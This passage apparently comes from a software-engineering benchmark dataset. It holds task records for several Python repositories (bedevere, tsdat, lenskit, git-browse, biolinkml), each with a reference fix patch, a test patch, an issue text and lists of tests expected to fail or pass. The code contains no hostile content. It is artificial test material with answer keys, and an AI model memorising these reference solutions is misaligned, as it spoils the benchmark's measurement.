"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoa/*[has_child(&anchored_value)][name()]-results10]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoa/*[!has_child(&anchored_value)][name()]-results11]",
"tests/test_processor.py::Test_Processor::test_wiki_array_element_searches[temperature[.",
"tests/test_processor.py::Test_Processor::test_wiki_collectors[consoles[.",
"tests/test_processor.py::Test_Processor::test_wiki_collector_math[(/standard/setup/action)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_math[(/standard[.!='']/action)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_math[(/standard[.!='']/id)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_order_of_ops[(/list1)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_order_of_ops[(/list2)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_order_of_ops[((/list1)",
"tests/test_processor.py::Test_Processor::test_wiki_search_array_of_hashes[warriors[power_level",
"tests/test_processor.py::Test_Processor::test_wiki_search_key_names[contrast_ct[.",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[hash_of_hashes.*[!has_child(child_two)]-results0]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/array_of_hashes/*[!has_child(child_two)]-results1]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/hash_of_hashes/*[!has_child(child_two)][name()]-results2]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[array_of_hashes.*[!has_child(child_two)].id-results3]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/array_of_arrays/*[!has_child(value2.1)]-results4]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[array_of_arrays[*!=value2.1]-results5]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[array_of_arrays.*[!has_child(value2.1)][name()]-results6]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/array_of_arrays[*!=value2.1][name()]-results7]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(/array_of_arrays/*[!has_child(value2.1)][name()])[0]-results8]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(array_of_arrays[*!=value2.1][name()])[0]-results9]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(array_of_arrays.*[!has_child(value2.1)][name()])[-1]-results10]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(/array_of_arrays[*!=value2.1][name()])[-1]-results11]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/simple_array[has_child(value1.1)]-results12]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/simple_array[!has_child(value1.3)]-results13]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[max(price)]-results0]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[max(price)]-results1]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[max(price)]/price-results2]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[max(price)]/price-results3]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[max(price)]/product-results4]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[max(price)][name()]-results5]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[prices_array[max()]-results6]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_aoh[max(price)]-results7]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_hash[max(price)]-results8]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_array[max()]-results9]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bare[max()]-results10]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_aoh[!max(price)])[max(price)]-results11]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_hash[!max(price)])[max(price)]-results12]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_aoh)-(prices_aoh[max(price)])[max(price)]-results13]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_hash)-(prices_hash[max(price)]).*[max(price)]-results14]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_aoh[!max(price)])[max(price)])[0]-results15]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_hash[!max(price)])[max(price)])[0]-results16]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_aoh[!max(price)])[max(price)])[0].price-results17]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_hash[!max(price)])[max(price)])[0].price-results18]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[min(price)]-results19]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[min(price)]-results20]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[min(price)]/price-results21]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[min(price)]/price-results22]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[min(price)]/product-results23]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[min(price)][name()]-results24]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[prices_array[min()]-results25]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_aoh[min(price)]-results26]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_hash[min(price)]-results27]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_array[min()]-results28]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bare[min()]-results29]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[**.Opal[parent()][name()]-results0]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[minerals.*.*.mohs_hardness[.>7][parent(2)][name()]-results1]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[minerals.*.*.[mohs_hardness[1]>7][name()]-results2]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[minerals.*.*(([mohs_hardness[0]>=4])-([mohs_hardness[1]>5]))[name()]-results3]"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-12-06 19:50:45+00:00
|
isc
| 6,272
|
|
python__bedevere-617
|
diff --git a/bedevere/prtype.py b/bedevere/prtype.py
index 0105e50..bccd879 100644
--- a/bedevere/prtype.py
+++ b/bedevere/prtype.py
@@ -43,7 +43,7 @@ async def classify_by_filepaths(gh, pull_request, filenames):
if util.is_news_dir(filename):
news = True
filepath = pathlib.PurePath(filename)
- if filepath.suffix == ".rst":
+ if filepath.suffix == ".rst" or filepath.name == ".nitignore":
docs = True
elif filepath.name.startswith("test_"):
tests = True
|
python/bedevere
|
b5bcd24e79ad72b47582f89f7e7053f5b3157fa4
|
diff --git a/tests/test_prtype.py b/tests/test_prtype.py
index 4fcaf0c..c9b0777 100644
--- a/tests/test_prtype.py
+++ b/tests/test_prtype.py
@@ -85,6 +85,26 @@ async def test_docs_no_news():
assert gh.post_data[0] == [Labels.docs.value, Labels.skip_news.value]
+async def test_docs_no_news_with_dotnitignore():
+ filenames = {"path/to/docs1.rst", "path/to/.nitignore"}
+ issue = {"labels": [], "labels_url": "https://api.github.com/some/label"}
+ gh = FakeGH(getitem=issue)
+ event_data = {
+ "action": "opened",
+ "number": 1234,
+ "pull_request": {
+ "url": "https://api.github.com/repos/cpython/python/pulls/1234",
+ "statuses_url": "https://api.github.com/some/status",
+ "issue_url": "https://api.github.com/repos/cpython/python/issue/1234",
+ },
+ }
+ await prtype.classify_by_filepaths(gh, event_data["pull_request"], filenames)
+ assert gh.getitem_url == "https://api.github.com/repos/cpython/python/issue/1234"
+ assert len(gh.post_url) == 1
+ assert gh.post_url[0] == "https://api.github.com/some/label"
+ assert gh.post_data[0] == [Labels.docs.value, Labels.skip_news.value]
+
+
async def test_docs_and_news():
filenames = {"/path/to/docs1.rst", f"Misc/NEWS.d/next/Lib/{GOOD_BASENAME}"}
issue = {"labels": [], "labels_url": "https://api.github.com/some/label"}
|
Add docs label for PRs that touch Doc/tools/.nitignore
See e.g. https://github.com/python/cpython/pull/114280 or https://github.com/python/cpython/pull/114194
|
0.0
|
b5bcd24e79ad72b47582f89f7e7053f5b3157fa4
|
[
"tests/test_prtype.py::test_docs_no_news_with_dotnitignore"
] |
[
"tests/test_prtype.py::test_no_files",
"tests/test_prtype.py::test_news_only",
"tests/test_prtype.py::test_docs_no_news",
"tests/test_prtype.py::test_docs_and_news",
"tests/test_prtype.py::test_tests_only",
"tests/test_prtype.py::test_docs_and_tests",
"tests/test_prtype.py::test_leave_existing_type_labels",
"tests/test_prtype.py::test_do_not_post_if_nothing_to_apply",
"tests/test_prtype.py::test_news_and_tests",
"tests/test_prtype.py::test_other_files"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-01-19 08:13:31+00:00
|
apache-2.0
| 5,111
|
|
tsdat__tsdat-23
|
diff --git a/tsdat/pipeline/ingest_pipeline.py b/tsdat/pipeline/ingest_pipeline.py
index f5dea5b..ef439d5 100644
--- a/tsdat/pipeline/ingest_pipeline.py
+++ b/tsdat/pipeline/ingest_pipeline.py
@@ -13,7 +13,7 @@ class IngestPipeline(Pipeline):
applying quality checks and quality controls, and by saving the
now-processed data in a standard file format."""
- def run(self, filepath: Union[str, List[str]]) -> None:
+ def run(self, filepath: Union[str, List[str]]) -> xr.Dataset:
"""Runs the IngestPipeline from start to finish.
:param filepath:
@@ -48,6 +48,8 @@ class IngestPipeline(Pipeline):
# Hook to generate custom plots
self.hook_generate_and_persist_plots(dataset)
+ return dataset
+
def hook_customize_dataset(
self, dataset: xr.Dataset, raw_mapping: Dict[str, xr.Dataset]
) -> xr.Dataset:
|
tsdat/tsdat
|
b5e1b0c6c7c94de86175b2b18f6b7fbc2c33cac8
|
diff --git a/tests/test_examples.py b/tests/test_examples.py
index e7c2a58..ff16cd0 100644
--- a/tests/test_examples.py
+++ b/tests/test_examples.py
@@ -67,25 +67,21 @@ def pipeline_produced_expected_directory_tree(pipeline: IngestPipeline) -> bool:
return True
-def pipeline_produced_expected_data(
- pipeline: IngestPipeline, expected_data_file: str
-) -> bool:
- filename = os.path.basename(expected_data_file)
-
- # Retrieve the output data file
- loc_id = pipeline.config.pipeline_definition.location_id
- datastream = DSUtil.get_datastream_name(config=pipeline.config)
- root: str = pipeline.storage._root
- output_file = os.path.join(root, loc_id, datastream, filename)
-
- # Assert that the basename of the processed file and expected file match
- assert os.path.isfile(output_file)
-
- # Compare data and optionally attributes to ensure everything matches.
- ds_out: xr.Dataset = xr.open_dataset(output_file)
- ds_exp: xr.Dataset = xr.open_dataset(expected_data_file)
-
- return ds_out.equals(ds_exp)
+def execute_test(
+ storage_config: str,
+ pipeline_config: str,
+ pipeline: IngestPipeline,
+ input_filepath: str,
+ expected_filepath: str,
+):
+ delete_existing_outputs(storage_config)
+ add_pipeline_module_to_path(storage_config)
+
+ _pipeline = pipeline(pipeline_config, storage_config)
+ ds = _pipeline.run(input_filepath)
+ expected_ds = xr.open_dataset(expected_filepath)
+ xr.testing.assert_allclose(ds, expected_ds)
+ assert pipeline_produced_expected_directory_tree(_pipeline)
def test_a2e_buoy_ingest_example():
@@ -98,23 +94,20 @@ def test_a2e_buoy_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = BuoyIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = BuoyIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_BUOY_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=BuoyIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_BUOY_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=BuoyIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_BUOY_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_BUOY_FILE)
def test_a2e_imu_ingest_example():
@@ -127,23 +120,20 @@ def test_a2e_imu_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = ImuIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = ImuIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_IMU_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=ImuIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_IMU_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=ImuIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_IMU_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_IMU_FILE)
def test_a2e_lidar_ingest_example():
@@ -156,23 +146,20 @@ def test_a2e_lidar_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = LidarIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = LidarIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_LIDAR_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=LidarIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_LIDAR_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=LidarIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_LIDAR_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_LIDAR_FILE)
def test_a2e_waves_ingest_example():
@@ -185,20 +172,17 @@ def test_a2e_waves_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = WaveIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = WaveIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_WAVES_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=WaveIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_WAVES_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=WaveIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_WAVES_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_WAVES_FILE)
|
`IngestPipeline.run(*)` should return the processed `xarray.Dataset()` object
|
0.0
|
b5e1b0c6c7c94de86175b2b18f6b7fbc2c33cac8
|
[
"tests/test_examples.py::test_a2e_buoy_ingest_example",
"tests/test_examples.py::test_a2e_imu_ingest_example",
"tests/test_examples.py::test_a2e_lidar_ingest_example",
"tests/test_examples.py::test_a2e_waves_ingest_example"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-11-22 23:29:48+00:00
|
bsd-2-clause
| 6,098
|
|
lenskit__lkpy-312
|
diff --git a/lenskit/metrics/topn.py b/lenskit/metrics/topn.py
index ae1b70f..7f616c5 100644
--- a/lenskit/metrics/topn.py
+++ b/lenskit/metrics/topn.py
@@ -300,11 +300,11 @@ def ndcg(recs, truth, discount=np.log2, k=None):
The maximum list length.
"""
- tpos = truth.index.get_indexer(recs['item'])
-
if k is not None:
recs = recs.iloc[:k]
+ tpos = truth.index.get_indexer(recs['item'])
+
if 'rating' in truth.columns:
i_rates = np.sort(truth.rating.values)[::-1]
if k is not None:
|
lenskit/lkpy
|
0716300a91e55b54e3da150c5fa8355af79fa745
|
diff --git a/tests/test_topn_ndcg.py b/tests/test_topn_ndcg.py
index 5d1601d..2fdf9e5 100644
--- a/tests/test_topn_ndcg.py
+++ b/tests/test_topn_ndcg.py
@@ -87,6 +87,14 @@ def test_ndcg_perfect():
assert ndcg(recs, truth) == approx(1.0)
+def test_ndcg_perfect_k_short():
+ recs = pd.DataFrame({'item': [2, 3, 1]})
+ truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
+ truth = truth.set_index('item')
+ assert ndcg(recs, truth, k=2) == approx(1.0)
+ assert ndcg(recs[:2], truth, k=2) == approx(1.0)
+
+
def test_ndcg_wrong():
recs = pd.DataFrame({'item': [1, 2]})
truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
|
nDCG metric does not correctly truncate lists
The nDCG metric has two faults whereby it fails to correctly truncate the truth list and recommendation list under certain conditions:
1. If no k is supplied, the full truth list and recommendation list are used to compute the ideal DCG and recommendation DCG, respectively. If the sizes of the input lists do not match, this causes an incorrect result. See the following example, based on "test_ndcg_wrong" in tests/test_topn_ndcg.py:
```
truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
truth = truth.set_index('item')
recs = pd.DataFrame({'item': [1, 2]})
print(ndcg(recs, truth)) # incorrectly gives ~0.7344
print(ndcg(recs, truth, k=2)) # correctly gives ~0.8888
```
2. If a k is supplied that is less than the length of the recommendation list, the recommendation DCG is not computed correctly (due to "tpos" being defined before the recommendation list is truncated). See the following example, based on "test_ndcg_perfect" found in tests/test_topn_ndcg.py:
```
truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
truth = truth.set_index('item')
recs = pd.DataFrame({'item': [2, 3, 1]})
print(ndcg(recs, truth)) # correctly gives 1.0
print(ndcg(recs, truth, k=2)) # incorrectly gives ~1.21
print(ndcg(recs[:2], truth, k=2)) # correctly gives 1.0
```
|
0.0
|
0716300a91e55b54e3da150c5fa8355af79fa745
|
[
"tests/test_topn_ndcg.py::test_ndcg_perfect_k_short"
] |
[
"tests/test_topn_ndcg.py::test_dcg_empty",
"tests/test_topn_ndcg.py::test_dcg_zeros",
"tests/test_topn_ndcg.py::test_dcg_single",
"tests/test_topn_ndcg.py::test_dcg_mult",
"tests/test_topn_ndcg.py::test_dcg_empty2",
"tests/test_topn_ndcg.py::test_dcg_zeros2",
"tests/test_topn_ndcg.py::test_dcg_single2",
"tests/test_topn_ndcg.py::test_dcg_nan",
"tests/test_topn_ndcg.py::test_dcg_series",
"tests/test_topn_ndcg.py::test_dcg_mult2",
"tests/test_topn_ndcg.py::test_ndcg_empty",
"tests/test_topn_ndcg.py::test_ndcg_no_match",
"tests/test_topn_ndcg.py::test_ndcg_perfect",
"tests/test_topn_ndcg.py::test_ndcg_wrong",
"tests/test_topn_ndcg.py::test_ndcg_perfect_k",
"tests/test_topn_ndcg.py::test_ndcg_bulk_at_top",
"tests/test_topn_ndcg.py::test_ndcg_bulk_not_at_top",
"tests/test_topn_ndcg.py::test_ndcg_bulk_match[False]",
"tests/test_topn_ndcg.py::test_ndcg_bulk_match[True]"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-03-11 19:46:49+00:00
|
mit
| 3,543
|
|
albertyw__git-browse-49
|
diff --git a/git_browse/browse.py b/git_browse/browse.py
index 47ccaeb..451f605 100755
--- a/git_browse/browse.py
+++ b/git_browse/browse.py
@@ -369,7 +369,8 @@ def get_git_config() -> str:
def get_git_url(git_config_file: str) -> str:
- config = configparser.ConfigParser()
+ # strict is removed here because gitconfig allows for multiple "fetch" keys
+ config = configparser.ConfigParser(strict=False)
config.read(git_config_file)
try:
git_url = config['remote "origin"']['url']
|
albertyw/git-browse
|
ee46082dd3dea8fbaa3148d67c26004f5b1f2b6b
|
diff --git a/git_browse/tests/test.py b/git_browse/tests/test.py
index 9578999..cb3ba05 100644
--- a/git_browse/tests/test.py
+++ b/git_browse/tests/test.py
@@ -2,6 +2,7 @@ import os
import re
import shutil
import sys
+import tempfile
from typing import List, cast
import unittest
from unittest.mock import MagicMock, patch
@@ -248,14 +249,22 @@ class GetGitConfig(unittest.TestCase):
class GetGitURL(unittest.TestCase):
def setUp(self) -> None:
- self.git_config_file = os.path.join(
+ git_config_file = os.path.join(
BASE_DIRECTORY,
'.git',
'config'
)
+ with open(git_config_file, 'rb') as handle:
+ configs = handle.read()
+ self.git_config_file = tempfile.NamedTemporaryFile()
+ self.git_config_file.write(configs)
+ self.git_config_file.seek(0)
+
+ def tearDown(self) -> None:
+ self.git_config_file.close()
def test_url(self) -> None:
- git_url = browse.get_git_url(self.git_config_file)
+ git_url = browse.get_git_url(self.git_config_file.name)
expected = 'git@github.com:albertyw/git-browse'
self.assertEqual(git_url.replace('.git', ''), expected)
@@ -263,6 +272,21 @@ class GetGitURL(unittest.TestCase):
with self.assertRaises(RuntimeError):
browse.get_git_url(BASE_DIRECTORY)
+ def test_multiple_fetch(self) -> None:
+ # For https://github.com/albertyw/git-browse/issues/48
+ config_contents = (
+ '[remote "origin"]\n'
+ ' fetch = refs/heads/my_name/*:refs/remotes/origin/my_name/*\n'
+ ' fetch = refs/heads/master:refs/remotes/origin/master\n'
+ ' url = git@github.com:albertyw/git-browse\n'
+ )
+ config_file = tempfile.NamedTemporaryFile()
+ config_file.write(config_contents.encode('utf-8'))
+ config_file.seek(0)
+ git_url = browse.get_git_url(config_file.name)
+ expected = 'git@github.com:albertyw/git-browse'
+ self.assertEqual(git_url.replace('.git', ''), expected)
+
class ParseGitURL(unittest.TestCase):
def setUp(self) -> None:
|
Support running with multiple fetch configs
gitconfig allows for multiple fetch configs which breaks configparser: https://stackoverflow.com/questions/15507264/can-i-specify-in-git-config-to-fetch-multiple-refspecs
|
0.0
|
ee46082dd3dea8fbaa3148d67c26004f5b1f2b6b
|
[
"git_browse/tests/test.py::GetGitURL::test_multiple_fetch"
] |
[
"git_browse/tests/test.py::TestGithubHost::test_commit_hash_url",
"git_browse/tests/test.py::TestGithubHost::test_directory_url",
"git_browse/tests/test.py::TestGithubHost::test_file_url",
"git_browse/tests/test.py::TestGithubHost::test_get_url",
"git_browse/tests/test.py::TestGithubHost::test_init",
"git_browse/tests/test.py::TestGithubHost::test_root_url",
"git_browse/tests/test.py::SourcegraphHost::test_create",
"git_browse/tests/test.py::SourcegraphHost::test_create_dot_git",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_commit",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_directory",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_file",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_root",
"git_browse/tests/test.py::SourcegraphHost::test_init",
"git_browse/tests/test.py::SourcegraphHost::test_valid_focus_object",
"git_browse/tests/test.py::TestGodocsHost::test_create",
"git_browse/tests/test.py::TestGodocsHost::test_create_dot_git",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_commit",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_directory",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_file",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_root",
"git_browse/tests/test.py::TestGodocsHost::test_init",
"git_browse/tests/test.py::TestGodocsHost::test_valid_focus_object",
"git_browse/tests/test.py::GitObject::test_is_directory",
"git_browse/tests/test.py::FocusObject::test_default",
"git_browse/tests/test.py::FocusObject::test_init",
"git_browse/tests/test.py::FocusObject::test_is_directory",
"git_browse/tests/test.py::FocusObject::test_is_not_directory",
"git_browse/tests/test.py::FocusObject::test_is_not_root",
"git_browse/tests/test.py::FocusObject::test_is_root",
"git_browse/tests/test.py::FocusHash::test_init",
"git_browse/tests/test.py::FocusHash::test_is_commit_hash",
"git_browse/tests/test.py::GetRepositoryRoot::test_fail_get",
"git_browse/tests/test.py::GetRepositoryRoot::test_get",
"git_browse/tests/test.py::GetGitConfig::test_get",
"git_browse/tests/test.py::GetGitURL::test_bad_url",
"git_browse/tests/test.py::ParseGitURL::test_broken_url",
"git_browse/tests/test.py::ParseGitURL::test_https_url",
"git_browse/tests/test.py::ParseGitURL::test_sourcegraph_github_host",
"git_browse/tests/test.py::ParseGitURL::test_sourcegraph_uber_host",
"git_browse/tests/test.py::ParseGitURL::test_ssh_url",
"git_browse/tests/test.py::TestGetFocusObject::test_default_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_directory_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_file_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_get_focus_hash",
"git_browse/tests/test.py::TestGetFocusObject::test_invalid_phabricator_object",
"git_browse/tests/test.py::TestGetFocusObject::test_nonexistend_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_phabricator_object",
"git_browse/tests/test.py::TestGetCommitHash::test_get_hash",
"git_browse/tests/test.py::TestGetCommitHash::test_get_unknown_hash",
"git_browse/tests/test.py::TestOpenURL::test_dry_open_url",
"git_browse/tests/test.py::TestOpenURL::test_open_subprocess",
"git_browse/tests/test.py::TestOpenURL::test_open_url",
"git_browse/tests/test.py::FullTest::test_check_version"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-10-19 04:46:20+00:00
|
mit
| 1,005
|
|
biolink__biolinkml-369
|
diff --git a/biolinkml/generators/pythongen.py b/biolinkml/generators/pythongen.py
index 63f4a7ca..48c9d2e1 100644
--- a/biolinkml/generators/pythongen.py
+++ b/biolinkml/generators/pythongen.py
@@ -197,12 +197,15 @@ dataclasses._init_fn = dataclasses_init_fn_with_kwargs
add_type_ref(self.schema.types[typ.typeof])
rval.add_element(typ)
+ def add_enum_ref(e: EnumDefinition) -> None:
+ rval.add_element(e)
+
def add_slot_range(slot: SlotDefinition) -> None:
if slot.range:
if slot.range in self.schema.types:
add_type_ref(self.schema.types[slot.range])
elif slot.range in self.schema.enums:
- pass
+ add_enum_ref(self.schema.enums[slot.range])
else:
cls = self.schema.classes[slot.range]
if cls.imported_from:
|
biolink/biolinkml
|
0b62bffabb4938208703acac990a6b2b6461fa7e
|
diff --git a/tests/test_issues/input/issue_368.yaml b/tests/test_issues/input/issue_368.yaml
new file mode 100644
index 00000000..0bc27c5b
--- /dev/null
+++ b/tests/test_issues/input/issue_368.yaml
@@ -0,0 +1,19 @@
+id: https://microbiomedata/schema
+
+prefixes:
+ biolinkml: https://w3id.org/biolink/biolinkml/
+
+imports:
+ - biolinkml:types
+ - issues_368_imports
+
+classes:
+
+ c:
+ is_a: parent_class
+ slots:
+ - s
+
+slots:
+ s:
+ range: e
diff --git a/tests/test_issues/input/issues_368_imports.yaml b/tests/test_issues/input/issues_368_imports.yaml
new file mode 100644
index 00000000..7e576cb0
--- /dev/null
+++ b/tests/test_issues/input/issues_368_imports.yaml
@@ -0,0 +1,10 @@
+id: https://microbiomedata/schema/mixs
+
+classes:
+ parent_class: {}
+
+enums:
+ e:
+ permissible_values:
+ a: A
+ b: B
diff --git a/tests/test_issues/test_issue_368.py b/tests/test_issues/test_issue_368.py
new file mode 100644
index 00000000..fa90edd4
--- /dev/null
+++ b/tests/test_issues/test_issue_368.py
@@ -0,0 +1,57 @@
+import os
+import unittest
+
+from jsonasobj import as_json
+
+from biolinkml.generators.pythongen import PythonGenerator
+from tests.test_issues.environment import env
+from tests.utils.python_comparator import compare_python, compile_python
+from tests.utils.test_environment import TestEnvironmentTestCase
+
+
+class Issue368TestCase(TestEnvironmentTestCase):
+ env = env
+
+ def header(self, txt: str) -> str:
+ return '\n' + ("=" * 20) + f" {txt} " + ("=" * 20)
+
+ def test_issue_368(self):
+ """ Make sure that types are generated as part of the output """
+ env.generate_single_file('issues_368_imports.py',
+ lambda: PythonGenerator(env.input_path('issues_368_imports.yaml'),
+ mergeimports=False).serialize(),
